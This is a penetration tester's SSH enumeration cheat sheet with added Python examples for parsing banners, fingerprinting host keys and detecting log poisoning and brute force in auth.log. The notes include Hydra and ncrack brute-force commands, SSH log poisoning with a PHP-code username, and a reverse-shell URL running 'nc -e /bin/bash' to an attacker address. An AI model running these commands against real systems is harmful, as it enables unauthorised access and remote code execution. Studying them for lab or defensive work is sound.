r3dcl1ff / Enumeration / SSH (22): SSH Enumeration and assorted commands
#Checklist
Check for SSH version vulns
Check for user enum
Check if the host key was seen somewhere else
Check if it prompts for a password - that means password authentication is enabled for at least some users
nmap -sV --script=ssh-hostkey -p22 10.10.10.10
Bruteforce if necessary with CeWL, Hydra, Patator or Crowbar
#Sysadmin shit
check ssh status >>>> sudo service ssh status
Start ssh server >>>> sudo service ssh start
Stop ssh server >>>> sudo service ssh stop
Restart ssh server >>>> sudo service ssh restart
netstat -tulpn | grep sshd >>>> (check if ssh is running and on which ports)
#If you find private keys:
chmod 600 key (not 777)
ssh -i key -p 22 target@10.10.10.10
#Generate private keys
#Banner Grabbing
nc -vn 192.168.101.158 22
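The line nc returns is the server's identification string (RFC 4253: SSH-protoversion-softwareversion [comments]), and that string is all a version-vuln check has to go on. The following is an added example, not part of r3dcl1ff's notes: a small parser that pulls the OpenSSH version out of a banner, flags anything below a threshold (7.7 here, the cut-off the notes use for username enumeration), and flags servers that still announce protocol 1 support. The banners in SAMPLE_BANNERS are constructed, not captured from any host; grab_banner is the only function that touches the network and just reads the first line the server sends.

```python
import re
import socket
from typing import Optional, Tuple

# Constructed sample banners; none were captured from a host mentioned in these notes.
SAMPLE_BANNERS = [
    "SSH-2.0-OpenSSH_7.2p1 Ubuntu-4ubuntu2.8",
    "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6",
    "SSH-2.0-OpenSSH_7.7",
    "SSH-1.99-Cisco-1.25",
    "220 mail.example.net ESMTP",  # something other than sshd answering on the port
]

# RFC 4253 identification string: SSH-protoversion-softwareversion [SP comments]
BANNER_RE = re.compile(r"^SSH-(?P<proto>\d+\.\d+)-(?P<software>\S+)(?:\s+(?P<comment>.*))?$")
# OpenSSH software strings look like OpenSSH_7.2p1; the pN suffix is the portable release number
OPENSSH_RE = re.compile(r"^OpenSSH_(?P<major>\d+)\.(?P<minor>\d+)(?:p(?P<portable>\d+))?")


def parse_banner(line: str) -> Optional[dict]:
    """Split an identification string into protocol version, software string and comment."""
    m = BANNER_RE.match(line.strip())
    if not m:
        return None
    return {"proto": m.group("proto"), "software": m.group("software"), "comment": m.group("comment") or ""}


def openssh_version(software: str) -> Optional[Tuple[int, int]]:
    """(major, minor) for an OpenSSH software string, None for other implementations."""
    m = OPENSSH_RE.match(software)
    if not m:
        return None
    return int(m.group("major")), int(m.group("minor"))


def allows_protocol_1(proto: str) -> bool:
    """'1.99' is a 2.0 server that still accepts protocol-1 clients (RFC 4253 5.1); any 1.x is legacy."""
    return proto.startswith("1.")


def assess(line: str, threshold: Tuple[int, int] = (7, 7)) -> dict:
    """Summarise one banner: is it SSH, which OpenSSH version, below threshold?, protocol-1 support?"""
    banner = parse_banner(line)
    if banner is None:
        return {"is_ssh": False}
    ver = openssh_version(banner["software"])
    return {
        "is_ssh": True,
        "software": banner["software"],
        "openssh": ver,
        "below_threshold": (ver < threshold) if ver else None,
        "protocol1": allows_protocol_1(banner["proto"]),
    }


def grab_banner(host: str, port: int = 22, timeout: float = 3.0) -> str:
    """Read the server's identification line; sshd sends it on connect, so nothing needs to be sent."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return sock.makefile("rb").readline().decode("utf-8", "replace").rstrip("\r\n")


if __name__ == "__main__":
    for b in SAMPLE_BANNERS:
        print(f"{b!r} -> {assess(b)}")
```

A version number from the banner is only a hint: distributions backport fixes without bumping it, so treat "below_threshold" as a reason to look closer, not as confirmation.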
#NMAP SSH scripts
ls -lh /usr/share/nmap/scripts/ssh
sudo nmap 10.11.1.71 -p 22 -sV --script=ssh-hostkey # hostkey script
#ssh-keyscan
ssh-keyscan -t rsa -p 22 192.168.101.158
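ssh-keyscan prints one "host keytype base64-blob" line per key, which is the raw material for the checklist item "check if the host key was seen somewhere else": the same key on several hosts usually means cloned images sharing a private key, and from the defender's side it is exactly the thing to hunt for across your own fleet. The following is an added example, not part of r3dcl1ff's notes, that turns keyscan lines into OpenSSH-style SHA256 fingerprints and groups hosts that share one. The lines in SAMPLE_KEYSCAN are constructed (RFC 5737 addresses, dummy key bytes in the correct SSH wire framing rather than real key material), so only the parsing and grouping logic is real.

```python
import base64
import hashlib
import struct
from collections import defaultdict


def wire_string(b: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def make_fake_blob(key_type: str, seed: bytes) -> str:
    """Constructed stand-in for a public-key blob: real blobs start with the key-type string
    in wire framing; here dummy bytes follow instead of real key material."""
    return base64.b64encode(wire_string(key_type.encode()) + wire_string(seed)).decode()


# Constructed ssh-keyscan-style output. 192.0.2.10 and .11 carry the same key,
# as two VMs cloned from one image would.
SAMPLE_KEYSCAN = "\n".join([
    "# 192.0.2.10:22 SSH-2.0-OpenSSH_7.2p1",
    "192.0.2.10 ssh-rsa " + make_fake_blob("ssh-rsa", b"\x00\x01" * 16),
    "192.0.2.11 ssh-rsa " + make_fake_blob("ssh-rsa", b"\x00\x01" * 16),
    "192.0.2.12 ssh-ed25519 " + make_fake_blob("ssh-ed25519", b"\x7f" * 32),
    "192.0.2.13 ssh-rsa " + make_fake_blob("ssh-rsa", b"\x42" * 32),
])


def fingerprint_sha256(b64_blob: str) -> str:
    """OpenSSH-style fingerprint: base64(sha256(raw blob)) with the '=' padding stripped."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def blob_key_type(b64_blob: str) -> str:
    """The first wire string inside a public-key blob is the key type it really encodes."""
    raw = base64.b64decode(b64_blob)
    (n,) = struct.unpack(">I", raw[:4])
    return raw[4:4 + n].decode()


def parse_keyscan(text: str) -> list:
    """Parse 'host keytype blob' lines, skip ssh-keyscan's '#' comment lines, fingerprint each key."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host, key_type, blob = line.split()[:3]
        encoded_type = blob_key_type(blob)
        if encoded_type != key_type:  # declared type must match what the blob itself says
            raise ValueError(f"{host}: declared {key_type} but blob encodes {encoded_type}")
        records.append({"host": host, "type": key_type, "fingerprint": fingerprint_sha256(blob)})
    return records


def shared_host_keys(records: list) -> dict:
    """fingerprint -> sorted hosts, for every fingerprint seen on more than one host."""
    by_fp = defaultdict(list)
    for r in records:
        by_fp[r["fingerprint"]].append(r["host"])
    return {fp: sorted(hosts) for fp, hosts in by_fp.items() if len(hosts) > 1}


if __name__ == "__main__":
    recs = parse_keyscan(SAMPLE_KEYSCAN)
    for r in recs:
        print(r["host"], r["type"], r["fingerprint"])
    for fp, hosts in shared_host_keys(recs).items():
        print("shared key", fp, "on", ", ".join(hosts))
```

Fingerprints computed this way match what ssh-keygen -lf prints for the same key, so the output can be compared directly against known_hosts entries or an asset inventory.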
# Hydra bruteforcing
sudo hydra -l admin -P rockyou.txt -v 192.168.101.133 ssh -s 22 -t 4
Good password list:
/usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt
#NCRACK
If push comes to shove, use ncrack to bruteforce:
ncrack -p 22 --user root -P ./passwords.txt 10.5.23.0/24
#Metasploit scanner
Metasploit user enumeration (useful for building a username list on the target for later cracking)
use auxiliary/ssh/ssh_enumusers
set rhost 10.10.10.10
set rport 22
set threads 1
set threshold 5
run
#SSH Log poisoning
Presupposes both an open SSH port and a file-inclusion (LFI) vuln in the web app; including the poisoned log is what turns it into RCE
1) kali
ssh ''@10.10.10.10
(target IP)
2) Target URL
http://10.10.10.10/search.php?id=/var/log/auth.log&cmd=ls -la
#Revshell
http://10.10.10.10/search.php?id=/var/log/auth.log&cmd=nc -e /bin/bash 192.168.101.95 1234
#Escaping Rbash
sudo ssh user@192.168.101.173 -t "bash --noprofile"
#RCE via SSH
Try to ssh into the box with PHP code as the username (quote it, or the shell eats the <, ( and ; characters)
ssh '<?php system($_GET["cmd"]);?>'@10.10.10.10
#Then include the SSH log files inside the web application
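The Hydra section, the log-poisoning steps and the "RCE via SSH" trick all rest on one sshd behaviour: the invalid username is written to auth.log verbatim, and so is every failed password attempt with its source address. That makes the log the place to catch both. The following is an added example, not part of r3dcl1ff's notes, showing the detection side: a parser over a constructed auth.log excerpt (RFC 5737 addresses, invented PIDs and timestamps) that flags usernames containing PHP or script markers and flags sources that exceed a failed-login threshold. The regexes assume standard OpenSSH wording ("Invalid user X from IP port P", "Failed password for [invalid user] X from IP port P ssh2", "Accepted METHOD for X from IP port P ssh2").

```python
import re
from collections import Counter

# Constructed auth.log excerpt; not a capture from any host in these notes.
SAMPLE_LOG = """\
Jan 10 12:00:01 web01 sshd[1234]: Invalid user <?php system($_GET["cmd"]);?> from 192.0.2.10 port 51234
Jan 10 12:00:01 web01 sshd[1234]: Failed password for invalid user <?php system($_GET["cmd"]);?> from 192.0.2.10 port 51234 ssh2
Jan 10 12:00:02 web01 sshd[1240]: Failed password for admin from 192.0.2.20 port 40001 ssh2
Jan 10 12:00:02 web01 sshd[1241]: Failed password for admin from 192.0.2.20 port 40002 ssh2
Jan 10 12:00:03 web01 sshd[1242]: Failed password for admin from 192.0.2.20 port 40003 ssh2
Jan 10 12:00:03 web01 sshd[1243]: Failed password for root from 192.0.2.20 port 40004 ssh2
Jan 10 12:00:04 web01 sshd[1244]: Failed password for root from 192.0.2.20 port 40005 ssh2
Jan 10 12:00:04 web01 sshd[1245]: Failed password for root from 192.0.2.20 port 40006 ssh2
Jan 10 12:00:05 web01 sshd[1246]: Failed password for alice from 198.51.100.7 port 50001 ssh2
Jan 10 12:00:09 web01 sshd[1250]: Accepted publickey for deploy from 198.51.100.5 port 33000 ssh2: ED25519 SHA256:placeholder-fingerprint
"""

# Greedy .* for the username: sshd logs it verbatim, so it may contain spaces; the last
# " from <ip> port <n>" on the line is the real one.
INVALID_USER_RE = re.compile(r"sshd\[\d+\]: Invalid user (?P<user>.*) from (?P<ip>\S+) port (?P<port>\d+)$")
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>.*) from (?P<ip>\S+) port (?P<port>\d+) ssh2$")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+) ssh2")
# Markers that have no business in a username: PHP open tags, superglobals, exec-style calls
POISON_RE = re.compile(r"<\?(?:php|=)|\$_(?:GET|POST|REQUEST|COOKIE)\b|\b(?:system|passthru|shell_exec|exec|eval)\s*\(", re.IGNORECASE)


def parse_line(line: str):
    """Classify one auth.log line as invalid_user / failed / accepted, or None if it is something else."""
    for event, rx in (("invalid_user", INVALID_USER_RE), ("failed", FAILED_RE), ("accepted", ACCEPTED_RE)):
        m = rx.search(line)
        if m:
            return {"event": event, "user": m.group("user"), "ip": m.group("ip")}
    return None


def poisoned_usernames(log_text: str) -> list:
    """(ip, username) for every auth event whose username looks like injected PHP or script code."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and POISON_RE.search(rec["user"]):
            hits.append((rec["ip"], rec["user"]))
    return hits


def failures_per_source(log_text: str) -> Counter:
    """Count failed password attempts per source address."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["event"] == "failed":
            counts[rec["ip"]] += 1
    return counts


def bruteforce_sources(log_text: str, threshold: int = 5) -> list:
    """Source addresses with at least `threshold` failed password attempts, sorted."""
    return sorted(ip for ip, n in failures_per_source(log_text).items() if n >= threshold)


if __name__ == "__main__":
    for ip, user in poisoned_usernames(SAMPLE_LOG):
        print(f"log poisoning attempt from {ip}: {user!r}")
    for ip in bruteforce_sources(SAMPLE_LOG):
        print(f"bruteforce source {ip}: {failures_per_source(SAMPLE_LOG)[ip]} failures")
```

The second half of the poisoning chain, the web app including /var/log/auth.log, only works if the PHP process can read that file; on Debian-family systems auth.log is normally 0640 root:adm, so a web server that can include it is itself misconfigured, and a restrictive include path on the application side closes the same door.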
#Vulnerable Versions: 7.2p1 | append command and get execution
ssh -v user@10.10.1.111 id
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 10.10.1.111 ([10.10.1.1114]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(user) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
#Force Auth method
ssh -v 10.10.1.111 -o PreferredAuthentications=password
#Linux with OpenSSH < 7.7
#Usage --> python ssh-username-enum.py 10.10.10.10 -w usernames.txt